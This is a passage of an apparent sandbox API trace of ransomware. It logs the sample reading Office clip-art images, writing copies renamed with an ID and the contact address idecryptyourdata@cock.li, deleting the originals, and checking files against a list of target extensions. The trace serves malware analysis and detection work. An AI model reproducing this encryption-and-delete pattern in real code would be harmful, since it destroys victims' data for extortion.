lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x5df0, lpOverlapped=0x0) returned 1 [0197.783] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.783] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.783] SetEndOfFile (hFile=0x3a4) returned 1 [0197.784] CloseHandle (hObject=0x3a4) returned 1 [0197.784] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.784] SetEndOfFile (hFile=0x358) returned 1 [0197.785] CloseHandle (hObject=0x358) returned 1 [0197.785] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.785] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg")) returned 1 [0197.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.786] lstrlenW (lpString=".doc") returned 4 [0197.786] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.786] lstrlenW (lpString=".docx") returned 5 [0197.786] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1 [0197.786] lstrlenW (lpString=".pdf") returned 4 [0197.786] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.786] lstrlenW (lpString=".xls") returned 4 [0197.786] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.786] lstrlenW (lpString=".xlsx") returned 5 [0197.786] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1 [0197.786] lstrlenW (lpString=".ppt") returned 4 [0197.786] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.786] lstrlenW (lpString=".zip") returned 4 [0197.786] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.786] lstrlenW (lpString=".rar") returned 4 [0197.786] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.786] lstrlenW (lpString=".bz2") returned 4 [0197.786] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.786] lstrlenW (lpString=".7z") returned 3 [0197.786] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.786] lstrlenW (lpString=".dbf") returned 4 [0197.787] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.787] lstrlenW (lpString=".1cd") returned 4 [0197.787] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.787] lstrlenW (lpString=".jpg") returned 4 [0197.787] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.787] lstrlenW (lpString=".doc") returned 4 [0197.787] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.787] lstrlenW (lpString=".docx") returned 5 [0197.787] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1 [0197.787] lstrlenW (lpString=".pdf") returned 4 [0197.787] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.787] lstrlenW (lpString=".xls") returned 4 [0197.787] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.787] lstrlenW (lpString=".xlsx") returned 5 [0197.787] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1 [0197.787] lstrlenW (lpString=".ppt") returned 4 [0197.787] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.787] lstrlenW (lpString=".zip") returned 4 [0197.787] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.787] lstrlenW (lpString=".rar") returned 4 [0197.787] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.787] lstrlenW (lpString=".bz2") returned 4 [0197.787] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.788] lstrlenW (lpString=".7z") returned 3 [0197.788] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.788] lstrlenW (lpString=".dbf") returned 4 [0197.788] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.788] lstrlenW (lpString=".1cd") returned 4 [0197.790] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 68 [0197.790] lstrlenW (lpString=".jpg") returned 4 [0197.790] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.790] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0197.790] lstrlenW (lpString="J0178632.JPG") returned 12 [0197.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.791] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=23338) returned 1 [0197.791] CloseHandle (hObject=0x358) returned 1 [0197.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg")) returned 0x220 [0197.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.791] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.792] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.793] GetLastError () returned 0x0 [0197.793] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x5b2a, lpOverlapped=0x0) returned 1 [0197.802] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x5b30, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x5b30, lpOverlapped=0x0) returned 1 [0197.804] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.804] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.804] SetEndOfFile (hFile=0x3a4) returned 1 [0197.804] CloseHandle (hObject=0x3a4) returned 1 [0197.804] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.804] SetEndOfFile (hFile=0x358) returned 1 [0197.805] CloseHandle (hObject=0x358) returned 1 [0197.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.805] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg")) returned 1 [0197.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.806] lstrlenW (lpString=".doc") returned 4 [0197.806] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.806] lstrlenW (lpString=".docx") returned 5 [0197.806] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0197.806] lstrlenW (lpString=".pdf") returned 4 [0197.806] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.806] lstrlenW (lpString=".xls") returned 4 [0197.806] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.806] lstrlenW (lpString=".xlsx") returned 5 [0197.806] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0197.806] lstrlenW (lpString=".ppt") returned 4 [0197.806] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.806] lstrlenW (lpString=".zip") returned 4 [0197.806] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.806] lstrlenW (lpString=".rar") returned 4 [0197.806] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.806] lstrlenW (lpString=".bz2") returned 4 [0197.806] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.806] lstrlenW (lpString=".7z") returned 3 [0197.806] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.807] lstrlenW (lpString=".dbf") returned 4 [0197.807] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.807] lstrlenW (lpString=".1cd") returned 4 [0197.807] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.807] lstrlenW (lpString=".jpg") returned 4 [0197.807] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.807] lstrlenW (lpString=".doc") returned 4 [0197.807] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.807] lstrlenW (lpString=".docx") returned 5 [0197.807] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0197.807] lstrlenW (lpString=".pdf") returned 4 [0197.807] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.807] lstrlenW (lpString=".xls") returned 4 [0197.807] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.807] lstrlenW (lpString=".xlsx") returned 5 [0197.807] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0197.807] lstrlenW (lpString=".ppt") returned 4 [0197.807] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.807] lstrlenW (lpString=".zip") returned 4 [0197.807] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.807] lstrlenW (lpString=".rar") returned 4 [0197.807] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.807] lstrlenW (lpString=".bz2") returned 4 [0197.808] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.808] lstrlenW (lpString=".7z") returned 3 [0197.808] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.808] lstrlenW (lpString=".dbf") returned 4 [0197.808] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.808] lstrlenW (lpString=".1cd") returned 4 [0197.808] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 68 [0197.808] lstrlenW (lpString=".jpg") returned 4 [0197.808] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.808] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0197.808] lstrlenW (lpString="J0178639.JPG") returned 12 [0197.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.809] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=32038) returned 1 [0197.809] CloseHandle (hObject=0x358) returned 1 [0197.809] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg")) returned 0x220 [0197.809] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.809] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.810] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.810] GetLastError () returned 0x0 [0197.810] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x7d26, lpOverlapped=0x0) returned 1 [0198.119] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x7d30, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x7d30, lpOverlapped=0x0) returned 1 [0198.120] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.120] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.120] SetEndOfFile (hFile=0x3a4) returned 1 [0198.121] CloseHandle (hObject=0x3a4) returned 1 [0198.121] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.121] SetEndOfFile (hFile=0x358) returned 1 [0198.122] CloseHandle (hObject=0x358) returned 1 [0198.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.122] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg")) returned 1 [0198.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG") returned 68 [0198.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG") returned 68 [0198.122] lstrlenW (lpString=".doc") returned 4 [0198.122] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0198.122] lstrlenW (lpString=".docx") returned 5 [0198.122] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1 [0198.122] lstrlenW (lpString=".pdf") returned 4 [0198.122] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0198.122] lstrlenW (lpString=".xls") returned 4 [0198.122] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0198.122] lstrlenW (lpString=".xlsx") returned 5 [0198.122] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1 [0198.122] lstrlenW (lpString=".ppt") returned 4 [0198.122] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0198.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG") returned 68 [0198.123] lstrlenW (lpString=".zip") returned 4 [0198.123] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0198.123] lstrlenW (lpString=".rar") returned 4 [0198.123] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0198.123] lstrlenW (lpString=".bz2") returned 4 [0198.123] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0198.123] lstrlenW (lpString=".7z") returned 3 [0198.123] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0198.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG") returned 68 [0198.123] lstrlenW (lpString=".dbf") returned 4 [0198.123] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0198.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG") returned 68 [0198.123] lstrlenW (lpString=".1cd") returned 4 [0198.123] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0198.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG") returned 68 [0198.123] lstrlenW (lpString=".jpg") returned 4 [0198.123] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0198.123] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.123] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185776.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0198.124] GetLastError () returned 0x0 [0198.124] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x69d8, lpOverlapped=0x0) returned 1 [0198.126] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x69e0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x69e0, lpOverlapped=0x0) returned 1 [0198.128] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.128] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.128] SetEndOfFile (hFile=0x3a4) returned 1 [0198.129] CloseHandle (hObject=0x3a4) returned 1 [0198.129] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.130] SetEndOfFile (hFile=0x358) returned 1 [0198.130] CloseHandle (hObject=0x358) returned 1 [0198.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.131] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185776.wmf")) returned 1 [0198.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF") returned 68 [0198.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF") returned 68 [0198.131] lstrlenW (lpString=".doc") returned 4 [0198.131] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.131] lstrlenW (lpString=".docx") returned 5 [0198.131] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0198.131] lstrlenW (lpString=".pdf") returned 4 [0198.131] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.131] lstrlenW (lpString=".xls") returned 4 [0198.131] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.131] lstrlenW (lpString=".xlsx") returned 5 [0198.132] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0198.132] lstrlenW (lpString=".ppt") returned 4 [0198.132] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF") returned 68 [0198.132] lstrlenW (lpString=".zip") returned 4 [0198.132] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.132] lstrlenW (lpString=".rar") returned 4 [0198.132] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.132] lstrlenW (lpString=".bz2") returned 4 [0198.132] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.132] lstrlenW (lpString=".7z") returned 3 [0198.132] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF") returned 68 [0198.132] lstrlenW (lpString=".dbf") returned 4 [0198.132] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF") returned 68 [0198.132] lstrlenW (lpString=".1cd") returned 4 [0198.132] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF") returned 68 [0198.132] lstrlenW (lpString=".jpg") returned 4 [0198.132] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.132] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.133] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" 